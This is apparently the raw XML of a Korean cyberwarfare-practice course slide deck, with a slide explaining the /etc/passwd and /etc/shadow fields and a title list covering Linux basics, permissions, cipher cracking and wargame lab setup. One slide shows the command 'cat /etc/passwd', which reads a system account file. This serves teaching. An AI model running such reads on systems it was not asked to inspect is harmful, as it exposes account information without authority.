                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>(x : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>암호화된 형태로 저장  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>=&gt; /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>/shadow </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>에 저장</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>)</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0 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>사용자 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>UID (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>리눅스의 모든 정보는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>수치값으로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t> 저장 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>: root -&gt; 0 (UID))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0 : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>사용자 소속 그룹 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>GID (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>리눅스의 모든 정보는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>수치값으로</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t> 저장 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>: root -&gt; 0 (GID))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정보 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>이름이나 연락처 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>같은것을</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>적는란</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>)</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계정 디렉토리 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>계정 홈 디렉토리</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움, dotum, Helvetica, sans-serif"/>
                        </a:rPr>
                        <a:t>) </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panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/bin/bash : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>사용자 로그인 쉘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>bash,csh,zsh</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>....)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="666666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a: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
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD2517B-A2B4-40EA-AD3B-87B074B4788E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3385098" y="1932300"/>
            <a:ext cx="4917170" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>cat /etc/passwd</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1572442403"/>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52977</TotalTime>
  <Words>34442</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>7961</Paragraphs>
  <Slides>434</Slides>
  <Notes>0</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>사용한 글꼴</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>22</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>테마</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>슬라이드 제목</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>434</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="457" baseType="lpstr">
      <vt:lpstr>Apple SD Gothic Neo</vt:lpstr>
      <vt:lpstr>AppleSDGothicNeo</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>HY중고딕</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Nanum Gothic</vt:lpstr>
      <vt:lpstr>Noto Sans KR</vt:lpstr>
      <vt:lpstr>Spoqa Han Sans</vt:lpstr>
      <vt:lpstr>돋움</vt:lpstr>
      <vt:lpstr>돋움, dotum, Helvetica, sans-serif</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>맑은 고딕 Semilight</vt:lpstr>
      <vt:lpstr>바탕</vt:lpstr>
      <vt:lpstr>한컴바탕</vt:lpstr>
      <vt:lpstr>함초롬바탕</vt:lpstr>
      <vt:lpstr>휴먼명조</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Montserrat</vt:lpstr>
      <vt:lpstr>Noto Sans</vt:lpstr>
      <vt:lpstr>Raleway</vt:lpstr>
      <vt:lpstr>Source Sans Pro</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>사이버전실습</vt:lpstr>
      <vt:lpstr>/  목  차</vt:lpstr>
      <vt:lpstr>/Intro   사이버전? </vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Intro  교수소개</vt:lpstr>
      <vt:lpstr>/Intro  PPT 구성</vt:lpstr>
      <vt:lpstr>/Intro  비대면 수업</vt:lpstr>
      <vt:lpstr>/Plan  강의안</vt:lpstr>
      <vt:lpstr>/Plan  강의안 - 단위과제</vt:lpstr>
      <vt:lpstr>/Plan/Inforsec  강의안 - 정보보호</vt:lpstr>
      <vt:lpstr>/Plan/Inforsec  강의안 – 정보보호</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Plan/Inforsec  강의안 - 정보보호</vt:lpstr>
      <vt:lpstr>/Plan/Defcybsec  강의안 – 국방 사이버 보안</vt:lpstr>
      <vt:lpstr>/Plan/Defcybsec  강의안 – 국방 사이버 보안</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Plan/Defcybsec  강의안 – 국방 사이버 보안</vt:lpstr>
      <vt:lpstr>/Plan/Circles  문화부 계획 – 정보보호반</vt:lpstr>
      <vt:lpstr>/Plan/Circles  문화부 계획 – 정보보호반</vt:lpstr>
      <vt:lpstr>/Plan/Circles  문화부 계획 – 정보보호반</vt:lpstr>
      <vt:lpstr>/Environ  환경</vt:lpstr>
      <vt:lpstr>/Environ/Python  Python 설치</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Environ/WindowUpdate  윈도우 10 업데이트</vt:lpstr>
      <vt:lpstr>/Environ/WSL2  WSL2 란?</vt:lpstr>
      <vt:lpstr>/Environ/WSL2  WSL2 설치</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Environ/WSL2(command)  WSL2 command 설치</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Environ/Docker  Docker 란?</vt:lpstr>
      <vt:lpstr>/Environ/Docker  WSL2 Docker 설치</vt:lpstr>
      <vt:lpstr>/Environ/VMware   VMware 설치</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Environ/HackerSchool   HackerSchool FTZ 설치</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Environ/WSLOfflinePackageInstall   WSL 패키지 오프라인 설치(bgpdump)</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Tool  Tool 사용법</vt:lpstr>
      <vt:lpstr>/Theory  이론</vt:lpstr>
      <vt:lpstr>/Theory  이론</vt:lpstr>
      <vt:lpstr>/Theory/T1   사이버전 실습체계 구조</vt:lpstr>
      <vt:lpstr>/Theory/T1   LMS</vt:lpstr>
      <vt:lpstr>/Theory/T1   LMS</vt:lpstr>
      <vt:lpstr>/Theory/T1   단위과제 기반 실습체계</vt:lpstr>
      <vt:lpstr>/Theory/T1   시나리오 기반 실습체계</vt:lpstr>
      <vt:lpstr>/Theory/T1   공격&amp;방어 실습체계</vt:lpstr>
      <vt:lpstr>/Theory/T1   체계 구성도</vt:lpstr>
      <vt:lpstr>/Theory/T2   리눅스 기본 명령어</vt:lpstr>
      <vt:lpstr>/Theory/T2/0  # 기본 유용한 명령어</vt:lpstr>
      <vt:lpstr>/Theory/T2/1  # pwd : 현재 디렉토리 경로 출력</vt:lpstr>
      <vt:lpstr>/Theory/T2/2  # cd : 경로 이동</vt:lpstr>
      <vt:lpstr>/Theory/T2/3  # ls : 디렉토리 목록 확인</vt:lpstr>
      <vt:lpstr>/Theory/T2/4  # mkdir : 디렉토리 생성</vt:lpstr>
      <vt:lpstr>/Theory/T2/5  # touch : 파일생성 및 날짜정보 변경</vt:lpstr>
      <vt:lpstr>/Theory/T2/6  # cat : 파일생성 및 출력</vt:lpstr>
      <vt:lpstr>/Theory/T2/7  # rm : 파일이나 디렉토리를 삭제</vt:lpstr>
      <vt:lpstr>/Theory/T2/8  # mv : 파일 혹은 디렉토리 이동</vt:lpstr>
      <vt:lpstr>/Theory/T2/9  # cp : 파일 혹은 디렉토리를 복사</vt:lpstr>
      <vt:lpstr>/Theory/T2/10  # man : 리눅스 매뉴얼 출력</vt:lpstr>
      <vt:lpstr>/Theory/T2/11  # head/tail : 보고싶은 줄 수만큼 출력</vt:lpstr>
      <vt:lpstr>/Theory/T2/12  # find : 특정 파일이나 디렉토리를 검색</vt:lpstr>
      <vt:lpstr>/Theory/T2/13  # chmod : 특정 파일의 권한 변경</vt:lpstr>
      <vt:lpstr>/Theory/T2/14  # chown : 특정 파일의 소유자 변경</vt:lpstr>
      <vt:lpstr>/Theory/T2/15  # chgrp : 특정 파일의 그룹 변경</vt:lpstr>
      <vt:lpstr>/Theory/T2/16  # cut :</vt:lpstr>
      <vt:lpstr>/Theory/T2/17  # service : 시스템 서비스 조작</vt:lpstr>
      <vt:lpstr>/Theory/T2/18  # grep : 특정 문자열 검색 명령어</vt:lpstr>
      <vt:lpstr>/Theory/T2/22  # vi : 리눅스 기본 편집기</vt:lpstr>
      <vt:lpstr>/Theory/T2/22  # vi : 리눅스 기본 편집기</vt:lpstr>
      <vt:lpstr>/Theory/T2/14  # chusr : 특정 파일의 소유자 변경</vt:lpstr>
      <vt:lpstr>/Theory/T2/14  # chusr : 특정 파일의 소유자 변경</vt:lpstr>
      <vt:lpstr>/Theory/T3   리눅스 파일 시스템</vt:lpstr>
      <vt:lpstr>/Theory/T3/Def  파일 시스템 이란?</vt:lpstr>
      <vt:lpstr>/Theory/T3/Def  파일 시스템 종류</vt:lpstr>
      <vt:lpstr>/Theory/T3/Def  파일 write() 순서</vt:lpstr>
      <vt:lpstr>/Theory/T3/History   리눅스 파일시스템 역사</vt:lpstr>
      <vt:lpstr>/Theory/T3/FSSTND   리눅스 파일시스템 표준</vt:lpstr>
      <vt:lpstr>/Theory/T3/FSSTND   리눅스 파일시스템 표준</vt:lpstr>
      <vt:lpstr>/Theory/T3/FSSTND   리눅스 파일시스템 표준</vt:lpstr>
      <vt:lpstr>/Theory/T3/FSSTND  리눅스 파일 시스템 표준</vt:lpstr>
      <vt:lpstr>/Theory/T3/FSSTND   리눅스 파일시스템 표준</vt:lpstr>
      <vt:lpstr>/Theory/T3/Structure   리눅스 파일시스템 구조</vt:lpstr>
      <vt:lpstr>/Theory/T3/Structure   리눅스 파일시스템 구조 – Ext4</vt:lpstr>
      <vt:lpstr>/Theory/T3/Structure   Ext4 – Super Block</vt:lpstr>
      <vt:lpstr>/Theory/T3/TimeStamp   파일 시스템 타임스탬프</vt:lpstr>
      <vt:lpstr>/Theory/T3/Permission   리눅스 파일시스템 권한( Permission )</vt:lpstr>
      <vt:lpstr>/Theory/T3/Permission   리눅스 파일시스템 권한 - 그룹</vt:lpstr>
      <vt:lpstr>/Theory/T3/Permission   리눅스 파일시스템 권한 – 권한의 수치화</vt:lpstr>
      <vt:lpstr>/Theory/T3/Link    파일 링크(link)</vt:lpstr>
      <vt:lpstr>/Theory/T3/Passwd    파일 패스워드 구조 – passwd</vt:lpstr>
      <vt:lpstr>/Theory/T3/Passwd    파일 패스워드 구조 – shadow</vt:lpstr>
      <vt:lpstr>/Theory/T4   고전암호</vt:lpstr>
      <vt:lpstr>/Theory/T4   고전암호</vt:lpstr>
      <vt:lpstr>/Theory/T4   암호 실습</vt:lpstr>
      <vt:lpstr>/Theory/T4/Ceasar   카이사르 암호</vt:lpstr>
      <vt:lpstr>/Theory/T4/Ceasar   고전암호 실습 – 카이사르 암호</vt:lpstr>
      <vt:lpstr>/Theory/T4/Ceasar    암호문</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T4/Ceasar    고전암호 크래킹 – 카이사르 암호 1</vt:lpstr>
      <vt:lpstr>/Theory/T4/Ceasar     암호문</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T4/Ceasar   카이사르 암호의 크랙</vt:lpstr>
      <vt:lpstr>/Theory/T4/Ceasar    고전암호 크래킹 – 카이사르 암호 2</vt:lpstr>
      <vt:lpstr>/Theory/T4/Ceasar    암호문</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T4/Substitution  치환 암호</vt:lpstr>
      <vt:lpstr>/Theory/T4/Substitution  치환 암호의 크랙</vt:lpstr>
      <vt:lpstr>/Theory/T4/Substitution  치환 암호의 크랙</vt:lpstr>
      <vt:lpstr>/Theory/T4/Substitution  치환 암호 변환기</vt:lpstr>
      <vt:lpstr>/Theory/T4/Ceasar    프로그래밍 조건</vt:lpstr>
      <vt:lpstr>/Theory/T4/Ceasar    암호문</vt:lpstr>
      <vt:lpstr>/Theory/T4/Ceasar    프로그래밍 예시</vt:lpstr>
      <vt:lpstr>/Theory/T4/Ceasar    해석</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T4/Vigenere  비즈네르 암호</vt:lpstr>
      <vt:lpstr>/Theory/T4/Vigenere 고전암호 실습 – 비즈네르 암호</vt:lpstr>
      <vt:lpstr>/Theory/T4/Vigenere     암호문</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T4/Vigenere     고전암호 실습 – 에니그마 영화</vt:lpstr>
      <vt:lpstr>/Theory/T4/Vigenere     고전암호 실습 – 에니그마 구조</vt:lpstr>
      <vt:lpstr>/Theory/T4/Vigenere     고전암호 실습 – 에니그마 해독</vt:lpstr>
      <vt:lpstr>/Theory/T5   현대암호</vt:lpstr>
      <vt:lpstr>/Theory/T5   현대암호</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA  현대암호 – 대칭키 vs 비대칭키</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA  현대암호 – 대칭키 vs 비대칭키</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA  현대암호 – RSA 암호</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA  현대암호 실습 – RSA 암호</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA   암호문</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA    오일러 함수</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA    오일러 정리</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA  현대암호 실습 – 오일러 정리</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA    프로그래밍 조건</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA    프로그래밍 예시</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA    오일러 정리 증명</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA  현대암호 – RSA 암호</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA  정보보호 기말과제</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA  현대암호 구현 – RSA 암호</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T5/Block  현대암호 – Block Cipher</vt:lpstr>
      <vt:lpstr>/Theory/T5/Block  현대암호 – Block Cipher</vt:lpstr>
      <vt:lpstr>/Theory/T5/Block  현대암호 – Block Cipher</vt:lpstr>
      <vt:lpstr>/Theory/T5/Block  현대암호 – Block Cipher</vt:lpstr>
      <vt:lpstr>/Theory/T6   시스템 보안이란?</vt:lpstr>
      <vt:lpstr>/Theory/T6   시스템 보안의 요소</vt:lpstr>
      <vt:lpstr>/Theory/T6   계정과 패스워드 관리</vt:lpstr>
      <vt:lpstr>/Theory/T7   로그</vt:lpstr>
      <vt:lpstr>/Theory/T7   로그</vt:lpstr>
      <vt:lpstr>/Theory/T14   정보의 표현</vt:lpstr>
      <vt:lpstr>/Theory/T14   정보의 표현</vt:lpstr>
      <vt:lpstr>/Theory/T14   정보의 표현 - 양수</vt:lpstr>
      <vt:lpstr>/Theory/T14   정보의 표현 - 진수</vt:lpstr>
      <vt:lpstr>/Theory/T14   정보의 표현 – 진수</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T14   정보의 표현 – 진수</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T14  음수의 표현</vt:lpstr>
      <vt:lpstr>/Theory/T14  음수의 표현- 보수</vt:lpstr>
      <vt:lpstr>/Theory/T14   음수의 표현 – 보수</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T14   실수의 표현- 부동소수점</vt:lpstr>
      <vt:lpstr>/Theory/T14   실수의 표현- 부동소수점</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Theory/T14   자료의 표현종류</vt:lpstr>
